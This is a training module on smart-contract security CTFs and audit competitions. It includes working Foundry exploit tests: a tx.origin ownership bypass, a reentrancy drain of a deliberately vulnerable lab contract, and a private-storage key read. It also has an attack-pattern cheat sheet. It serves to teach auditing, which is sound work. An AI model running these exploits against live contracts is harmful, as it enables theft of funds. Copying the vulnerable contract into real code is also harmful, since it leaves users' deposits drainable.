
Module 10 — CTF & Wargames

Difficulty: Beginner → Advanced

Hands-on practice is the fastest way to internalize Web3 security concepts. This module covers the major CTF platforms, competitive audit arenas, and practice resources, with solving strategies and the recurring vulnerability patterns to look for.


10.1 Ethernaut (OpenZeppelin)

URL: ethernaut.openzeppelin.com

Ethernaut is the standard starter CTF for blockchain security: 30+ browser-based levels, each a deployed contract with a stated win condition that you attack on a testnet instance. The levels cover the fundamental vulnerability classes in roughly increasing difficulty.

Level Categories & Solving Approach

| Category | Levels | Key Skills |
|---|---|---|
| Basic Ethereum | 0-3 (Hello, Fallback, Fallout, Coin Flip) | Wallet interaction, fallback functions, weak on-chain randomness |
| Access Control | 4-6 (Telephone, Token, Delegation) | tx.origin vs msg.sender, integer overflow, delegatecall |
| Storage & ETH Handling | 7-10 (Force, Vault, King, Re-entrancy) | Force-sending ETH, reading private storage, DoS, reentrancy |
| Advanced | 11-20 (Elevator, Privacy, GatekeeperOne/Two, …) | Interface tricks, storage layout, gas manipulation |
| Expert | 21+ (Shop, Dex, Puzzle Wallet, Motorbike, …) | View-function manipulation, DEX math, proxy attacks |

Solving Methodology

```text
For each Ethernaut level:
1. READ the contract source code completely
2. IDENTIFY what the "win condition" requires
3. MAP the vulnerability class (check [Module 03](/Hack_web3/modules/SMART_CONTRACT_VULNERABILITIES.html))
4. PLAN the exploit (which cheatcode/pattern to use)
5. WRITE interaction code (Foundry, cast, or browser console)
6. EXECUTE on the testnet instance
7. VERIFY with the Submit Instance button

Example — Level 4 (Telephone):
- Win condition: Claim ownership
- Vulnerability: tx.origin vs msg.sender confusion
- Solution: Call through an intermediary contract
  → msg.sender = intermediary, tx.origin = you
```
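A Foundry test that carries the Telephone walkthrough above through to a passing assertion. This is an added example, not Ethernaut's or OpenZeppelin's code: the `Telephone` contract here is a minimal reconstruction of the level's ownership check and assumes the real level adds nothing security-relevant beyond the `tx.origin != msg.sender` comparison; `TelephoneAttacker` and the test names are ours.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Reconstruction of the Telephone level's logic (assumption: the real level
// contains nothing beyond this check).
contract Telephone {
    address public owner;

    constructor() {
        owner = msg.sender;
    }

    function changeOwner(address _owner) public {
        // Only rejects an EOA calling directly. A contract in the middle makes
        // msg.sender != tx.origin while tx.origin is still the player's EOA.
        if (tx.origin != msg.sender) {
            owner = _owner;
        }
    }
}

// Intermediary: Telephone sees msg.sender == this contract, tx.origin == the EOA.
contract TelephoneAttacker {
    function attack(Telephone target, address newOwner) external {
        target.changeOwner(newOwner);
    }
}

contract TelephoneTest is Test {
    Telephone internal telephone;
    address internal player = makeAddr("player");

    function setUp() public {
        telephone = new Telephone(); // owner == address(this), the test contract
    }

    function test_directCallDoesNotChangeOwner() public {
        // vm.prank(msgSender, txOrigin): a direct EOA call has both equal,
        // so the guard rejects it and ownership is unchanged.
        vm.prank(player, player);
        telephone.changeOwner(player);
        assertEq(telephone.owner(), address(this));
    }

    function test_claimOwnershipThroughIntermediary() public {
        TelephoneAttacker attacker = new TelephoneAttacker();
        // The prank applies to the next call: attacker.attack() is sent by the
        // player EOA, and the nested call into Telephone comes from the attacker.
        vm.prank(player, player);
        attacker.attack(telephone, player);
        assertEq(telephone.owner(), player);
    }
}
```

Against a live instance the same intermediary is driven with `cast send <attacker> "attack(address,address)" <instance> <your-address> --rpc-url <url> --private-key <key>`; the second test is the local check that the pattern works before spending testnet gas.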

Common Ethernaut Patterns

| Pattern | Levels It Appears In |
|---|---|
| tx.origin authentication bypass | Telephone |
| Integer overflow (pre-0.8.x) | Token |
| delegatecall context preservation | Delegation, Preservation, Puzzle Wallet |
| Private storage is publicly readable | Vault, Privacy |
| Force-send ETH via selfdestruct | Force |
| DoS via a receiver that reverts | King |
| EVM gas mechanics | GatekeeperOne |
| Proxy storage collision | Puzzle Wallet |
| Uninitialized implementation behind a proxy | Motorbike |

10.2 Damn Vulnerable DeFi (tinchoabbate)

URL: damnvulnerabledefi.xyz

DvD is the gold standard for DeFi-specific challenges. It is more complex than Ethernaut, is built around DeFi primitives (flash loans, AMMs, lending, governance), and ships as a Foundry project in which each challenge's test file encodes the success condition.

Challenge Categories

| Category | Challenges | Concepts |
|---|---|---|
| Flash Loans | Unstoppable, Naive Receiver, Truster, Side Entrance | Flash loan mechanics, callback exploitation |
| Token Distribution & Oracles | The Rewarder, Compromised | Reward snapshot timing, trust in oracle key material |
| Lending & Price Manipulation | Puppet, Puppet V2, Free Rider | Spot-price (AMM) oracle manipulation, flash-loan / flash-swap financed attacks |
| Governance & Wallets | Selfie, Backdoor | Flash-loan-backed governance votes, Safe wallet setup abuse |
| Advanced | Climber, Wallet Mining, ABI Smuggling | Timelock ordering, CREATE2 address prediction, calldata/ABI edge cases |

Approach for Each Challenge

```text
1. Read the README and understand the goal
2. Read ALL contracts in the challenge, including tests
3. Understand the "success condition" in the test file
4. Identify the invariant that you need to break
5. Write the exploit in the test framework provided
6. Run: forge test --mt test_challengeName -vvvv
```

Challenge Hints (Spoiler-Free Approaches)

| Challenge | Approach Hint |
|---|---|
| Unstoppable | How can you break the flash loan invariant without using the pool? |
| Naive Receiver | Who pays for the flash loan fee? |
| Truster | What can you do during the flash loan callback? |
| Side Entrance | Can you deposit into the pool during a flash loan? |
| The Rewarder | When are reward snapshots taken? |
| Selfie | Can you acquire governance power temporarily? |
| Puppet | What price source does the pool use? |
| Free Rider | Can you buy NFTs with the marketplace's own funds? |
| Climber | What order does the timelock check things? |

10.3 Paradigm CTF

URL: historical challenges are published on GitHub (see Study Resources below)

Paradigm CTFs feature cutting-edge challenges that go well beyond the standard vulnerability patterns; expect to read bytecode, do AMM math by hand, and occasionally attack the challenge infrastructure itself.

Notable Challenge Types

| Category | Description | Skills Required |
|---|---|---|
| EVM puzzles | Exploit opcodes directly | Bytecode, assembly |
| DeFi challenges | Complex protocol attacks | Flash loans, AMM math |
| Cross-chain | Multi-chain exploitation | Bridge understanding |
| ZK challenges | Circuit vulnerabilities | Zero-knowledge basics |
| Meta-game | Challenge infrastructure exploitation | Out-of-the-box thinking |

Study Resources

Paradigm CTF solutions and writeups:
- https://github.com/paradigmxyz/paradigm-ctf-2023
- Community writeups on Mirror, Medium, and personal blogs
- cmichel's writeups: cmichel.io
- samczsun's blog: samczsun.com

10.4 Competitive Audit Platforms

Code4rena

URL: code4rena.com

| Aspect | Details |
|---|---|
| Format | Time-limited competitive audits (3–21 days) |
| Payout | Shared prize pool, split among valid unique findings |
| Severity | High, Medium (paid), QA/Gas (small reward) |
| Good for | Building a track record, learning from judging |

Approaching a Code4rena Contest:

```text
Day 1: Full codebase scan, Slither run, understand architecture
Day 2-3: Deep manual review of core contracts
Day 4-5: Focus on economic attack vectors and edge cases
Day 6-7: Write findings and PoCs
```

Sherlock

URL: sherlock.xyz

| Aspect | Details |
|---|---|
| Format | Time-limited contests with a Lead Senior Watson (LSW) |
| Payout | Based on finding uniqueness and severity |
| Judging | LSW judges, followed by an escalation process |
| Good for | Higher-quality judging, clearer severity rules |

CodeHawks (Cyfrin)

URL: codehawks.com

| Aspect | Details |
|---|---|
| Format | Competitive audits + First Flights (beginner-friendly) |
| Payout | Prize pool per contest |
| Good for | Beginners (First Flights), structured learning path |

Immunefi Bug Bounties

URL: immunefi.com

| Aspect | Details |
|---|---|
| Format | Ongoing bug bounties on live protocols |
| Payout | Up to $10M+ for critical findings |
| Good for | Real-world impact, highest payouts |

10.5 Additional Practice Platforms

| Platform | Focus | URL |
|---|---|---|
| OnlyPwner | Smart contract CTF challenges | onlypwner.xyz |
| EVM Puzzles | Opcode-level puzzles | github.com/fvictorio/evm-puzzles |
| Capture the Ether | Classic Ethereum CTF | capturetheether.com |
| DeFi Hack Labs | Reproduce real exploits | github.com/SunWeb3Sec/DeFiHackLabs |
| Mr Steal Yo Crypto | DeFi attack challenges | mrstealyocrypto.xyz |
| Secureum RACE | Quiz-style Solidity security | secureum.substack.com |

10.6 Building Your Own Vulnerable Lab

Quick Foundry-Based Lab

```bash
# Create a lab project
forge init vuln-lab && cd vuln-lab

# Create vulnerable contracts
mkdir -p src/challenges

# Run your lab against test exploits
forge test -vvvv
```
```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// src/challenges/ReentrancyChallenge.sol
contract ReentrancyChallenge {
    mapping(address => uint256) public balances;

    // The lab deploys this contract pre-funded (new ReentrancyChallenge{value: ...}())
    // so there is something to drain.
    constructor() payable {}

    function deposit() external payable {
        balances[msg.sender] += msg.value;
    }

    // Intentionally vulnerable: the external call happens before the caller's
    // balance is zeroed, so a receive() hook can call withdraw() again.
    function withdraw() external {
        uint256 balance = balances[msg.sender];
        (bool success, ) = msg.sender.call{value: balance}("");
        require(success);
        balances[msg.sender] = 0;
    }

    // Win condition: the contract has been fully drained.
    function isSolved() external view returns (bool) {
        return address(this).balance == 0;
    }
}
```
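The exploit side of the lab, as a Foundry test that drains the challenge above. This is an added example and not part of the page's lab scaffold; it assumes the challenge contract is saved at `src/challenges/ReentrancyChallenge.sol` with an SPDX/pragma header, and the `ReentrancyAttacker` contract, the `victim`/`player` addresses and the 10 ether fixture are constructed for the test.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";
import {ReentrancyChallenge} from "../src/challenges/ReentrancyChallenge.sol";

// Attacker: deposits a stake, then re-enters withdraw() from receive() while the
// challenge still holds at least the attacker's recorded balance.
contract ReentrancyAttacker {
    ReentrancyChallenge public immutable target;
    address public immutable owner;

    constructor(ReentrancyChallenge _target) {
        target = _target;
        owner = msg.sender;
    }

    function attack() external payable {
        require(msg.value > 0, "need a stake");
        target.deposit{value: msg.value}();
        target.withdraw(); // first withdrawal kicks off the re-entrant loop
        (bool ok, ) = owner.call{value: address(this).balance}("");
        require(ok, "payout failed");
    }

    receive() external payable {
        // balances[address(this)] has not been zeroed yet, so withdraw() pays
        // the same amount again; stop when the pool can no longer cover it,
        // otherwise the failing call would revert the whole chain.
        if (address(target).balance >= target.balances(address(this))) {
            target.withdraw();
        }
    }
}

contract ReentrancyChallengeTest is Test {
    ReentrancyChallenge internal challenge;
    address internal victim = makeAddr("victim");
    address internal player = makeAddr("player");

    function setUp() public {
        challenge = new ReentrancyChallenge();
        // Constructed fixture: an honest depositor puts 10 ether in the pool.
        vm.deal(victim, 10 ether);
        vm.prank(victim);
        challenge.deposit{value: 10 ether}();
        vm.deal(player, 1 ether);
    }

    function test_drainViaReentrancy() public {
        vm.startPrank(player);
        ReentrancyAttacker attacker = new ReentrancyAttacker(challenge);
        attacker.attack{value: 1 ether}();
        vm.stopPrank();

        // Pool is empty: this is exactly what the lab's isSolved() checks.
        assertEq(address(challenge).balance, 0);
        // Player turned a 1 ether stake into the victim's 10 ether plus the stake.
        assertEq(player.balance, 11 ether);
        assertEq(challenge.balances(address(attacker)), 0);
        // The ledger still owes the victim 10 ether that no longer exists.
        assertEq(challenge.balances(victim), 10 ether);
    }
}
```

Run it with `forge test --mt test_drainViaReentrancy -vvvv`; the trace shows eleven nested `withdraw()` calls, each paying 1 ether before any balance is zeroed. Moving `balances[msg.sender] = 0;` above the external call (checks-effects-interactions) makes every nested `withdraw()` send 0 and the drain collapses to a single honest withdrawal.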

10.7 CTF Pattern Recognition Cheat Sheet

| Pattern You See | Vulnerability | Solution Direction |
|---|---|---|
| External call before state update | Reentrancy | Attack contract that re-enters from receive()/fallback |
| tx.origin in require | Access control bypass | Call through an intermediary contract |
| block.timestamp / block.number in logic | Timestamp/block dependence | In tests, vm.warp / vm.roll; on-chain, wait for the right block or exploit the proposer's limited control over timestamp |
| delegatecall to a user-controlled target | Code execution in the caller's storage context | Point it at your malicious contract; its writes land in the caller's storage |
| Private state variable | False sense of privacy | Read the slot directly (eth_getStorageAt, cast storage, vm.load) |
| Solidity < 0.8.0 arithmetic without SafeMath | Integer overflow/underflow | Trigger the wrap-around |
| transfer / send for ETH | 2300-gas stipend and push-payment DoS | A receiver that reverts (or has no receive()) blocks the payout |
| No slippage check on swap | Price manipulation | Flash loan, move the pool price, let the victim trade at the bad price |
| Upgradeable without initializer guard | Uninitialized implementation | Call initialize() on the implementation directly |
| ERC20 with callbacks (ERC-777) or ERC-721 onReceived hooks | Reentrancy via token hooks | Re-enter from the hook during the transfer |
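The "private state variable" row in practice, as an added example (not Ethernaut's Privacy level and not code from the page): the `PrivateVault` target is constructed here with a storage layout chosen to mirror the packed-slot shape of that level, and the test shows how to read a packed slot with `vm.load`, unpack its fields by shifting, and pull a `bytes16` key out of a later slot. The slot numbers are derived from the declaration order and sizes shown in the comments.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

import {Test} from "forge-std/Test.sol";

// Constructed target. Storage layout (declaration order, 32-byte slots):
//   slot 0: locked (bool; alone, because the next variable needs a full slot)
//   slot 1: id (uint256)
//   slot 2: flattening (uint8, byte 0) | denomination (uint8, byte 1) | awkwardness (uint16, bytes 2-3)
//   slot 3..5: data[0..2] (bytes32 each)
contract PrivateVault {
    bool public locked = true;
    uint256 public id;
    uint8 private flattening = 10;
    uint8 private denomination = 255;
    uint16 private awkwardness;
    bytes32[3] private data;

    constructor(bytes32[3] memory _data) {
        id = block.timestamp;
        awkwardness = uint16(block.timestamp);
        data = _data;
    }

    // "private" only hides the variable from other contracts' Solidity code;
    // every node will hand the slot to anyone who asks.
    function unlock(bytes16 key) external {
        require(key == bytes16(data[2]), "wrong key");
        locked = false;
    }
}

contract PrivateVaultTest is Test {
    PrivateVault internal vault;
    // Constructed secrets; on a real instance these are the values you do not know.
    bytes32 internal constant SECRET2 = keccak256("constructed secret 2");

    function setUp() public {
        bytes32[3] memory d = [keccak256("s0"), keccak256("s1"), SECRET2];
        vault = new PrivateVault(d);
    }

    function test_readPackedSlot() public {
        // Same word `cast storage <vault> 2` or eth_getStorageAt returns on-chain.
        uint256 word = uint256(vm.load(address(vault), bytes32(uint256(2))));
        uint8 flattening = uint8(word);          // byte 0 (least significant)
        uint8 denomination = uint8(word >> 8);   // byte 1
        uint16 awkwardness = uint16(word >> 16); // bytes 2-3
        assertEq(flattening, 10);
        assertEq(denomination, 255);
        assertEq(awkwardness, uint16(block.timestamp));
    }

    function test_unlockWithKeyReadFromStorage() public {
        bytes32 slot5 = vm.load(address(vault), bytes32(uint256(5))); // data[2]
        assertEq(slot5, SECRET2);
        // bytes16(bytes32) keeps the high-order 16 bytes, matching the contract's cast.
        vault.unlock(bytes16(slot5));
        assertFalse(vault.locked());
    }
}
```

Packed slots are where people slip: the first declared variable sits in the least significant bytes, so unpacking is a right shift by `8 * offset` followed by a truncating cast, and a `bytes32` to `bytesN` conversion keeps the leading bytes while a `uintN` conversion keeps the trailing ones.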

10.8 Speed Auditing Techniques for Competitions

Time-Optimized Workflow

```text
Minutes 0-30: RAPID SCAN
├── Read README/docs (understand the protocol intent)
├── List all external/public functions
├── Run Slither (background)
├── Run Aderyn (background)
└── Note down contract sizes and inheritance

Minutes 30-120: DEEP DIVE ON CRITICAL CONTRACTS
├── Follow the money (deposit → internal logic → withdrawal)
├── Check all access control
├── Look for external calls (reentrancy surface)
├── Check oracle interactions
└── Review token handling (fee-on-transfer, rebasing)

Minutes 120-180: ATTACK BRAINSTORMING
├── Can I manipulate an oracle with a flash loan?
├── Can I reenter during any callback?
├── Can I bypass access control?
├── Are there rounding errors in share calculations?
├── What happens at extreme values (0, type(uint256).max)?
└── What if two functions are called in the same transaction?

Minutes 180+: POC WRITING
├── Write Foundry test for each finding
├── Classify severity
└── Submit
```

Quick Wins Checklist (Things to Check First)

Key Takeaway: The best way to get fast at finding bugs is volume. Solve every Ethernaut level, complete Damn Vulnerable DeFi, then jump into competitive audits. After your first 5–10 contests you will have the pattern recognition that makes review much faster. The difference between finding 1 bug and finding 10 bugs in a contest is not 10x skill; it is having seen the patterns before.

